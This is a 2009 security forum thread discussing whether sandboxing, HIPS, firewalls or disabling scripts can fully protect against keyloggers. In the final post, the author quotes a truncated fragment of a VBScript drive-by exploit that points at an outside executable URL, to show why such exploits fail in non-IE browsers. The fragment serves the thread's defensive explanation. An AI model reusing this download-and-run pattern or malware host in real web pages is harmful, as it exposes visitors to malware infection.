Is it possible to be protected against all Key-loggers?

Discussion in 'other anti-malware software' started by ssj100, May 28, 2009.

Thread Status:
Not open for further replies.
  1. ssj100

    ssj100 Guest

    http://www.sandboxie.com/index.php?DetectingKeyLoggers

    I found the above to be a very interesting read. My conclusion is that the only way to be 100% safe from key-loggers while browsing is to always browse in a clean sandbox each time (and also ensure that your other sandboxes are shut down).

    My question is whether there is any other method to have 100% protection against malicious key-loggers?

    On doing a search through Wilders forum, I see that with the test "Through the eyes of a key-logger", nothing passed it 100% (I am not counting black-listing programs of course). See here:
    https://www.wilderssecurity.com/showthread.php?t=235884&highlight=keylogger tests

    However, prevention (stopping the key-logger from even trying to start) is always the best method, and thus a well configured Sandboxie, most HIPS programs, and anti-executables would prevent these types of key-logger attacks.

    But what about "Scripted Key-Loggers" and "Windows Message Key-Loggers" (http://www.sandboxie.com/index.php?DetectingKeyLoggers) that can record keystrokes within a running program (eg. Firefox.exe)? I guess the question is whether these specific Key-loggers can use Firefox.exe or Opera.exe or Iexplore.exe etc to leak information out without having to run a process (or run a process that will always be allowed by a HIPS etc)? These are the ones where I think the only way to be 100% secure is to always use a clean sandbox when entering personal information that you don't want to be leaked. This means if you want to be 100% secure from key-loggers, you'll need to either delete the sandbox you're using and restart your browser in the deleted (clean) sandbox , or use a separate sandbox that you only use for private matters (like banking).

    Any comments or thoughts (particularly from Rmus and Kees etc) will be very welcome.
     
  2. jmonge

    jmonge Registered Member

    Joined:
    Mar 20, 2008
    Posts:
    12,883
    Location:
    Canada
    for the last part a well strong configure firewall will stop data leak from any browser:)
     
  3. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    I'm not much help here since I have no experience in detection.

    Usually in reading articles as the one you cite, I get to something like,

    and I stop, because I never assume something I haven't authorized will install. That's why I find it more useful to look at actual exploits to see how they can be prevented from installing, rather than letting something run to see how it can be detected.

    As for scripted keyloggers, well, that implies scripting is enabled for the site. Useful on Google if you like the pop-down menu of suggestions as you are typing your search. If concerned about an embedded scripted keylogger, turn off javascript.

    From what you describe, if a keylogger is present, the sandbox seems to be a pretty good solution in containing everything.

    As far as 100% protection - who can guarantee that about anything!

    Take deciding whether or not to download a new program. Maybe the user is worried that it has a keylogger built in. Either

    1) you trust your source of the download

    2) you trust a scanner

    Neither is 100% guaranteed, so you do whichever gives you the most peace of mind!

    regards,

    rich
     
  4. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    True. It's a trade-off and directly dependent on what gives the user the best peace of mind!

    Also, risk assessment is helpful:

    • Are there active keylogging exploits where embedded script keyloggers have been found? A quick search did not turn up any.

    • What are the chances that your secure sites where you log in for transactions will have a script keylogger embedded in the code?

    Are you aware of web sites using VBScript? They will be cutting out any but IE users:

    http://www.opera.com/support/kb/view/415/
    http://www.webmasterworld.com/firefox_browser/3477161.htm
    This is why remote code execution exploits that use VBScript won't work in Opera/Firefox:

    Code:
    <html>
    <[B][COLOR="DarkRed"]script language="VBScript[/COLOR][/B]">
    on error resume next
    OOOOOOOOOOOOOwwwwwww ="http://bjgxt.cn/rtpp.exe"
    Set eeeeeeeeeeeennnnnnnnnnn = document.createElement("obj"&"ect")
    ....
    
    Again, it seems your solution with a sandbox is ideal to cover all of your concerns.

    ----
    rich
     
Loading...
Thread Status:
Not open for further replies.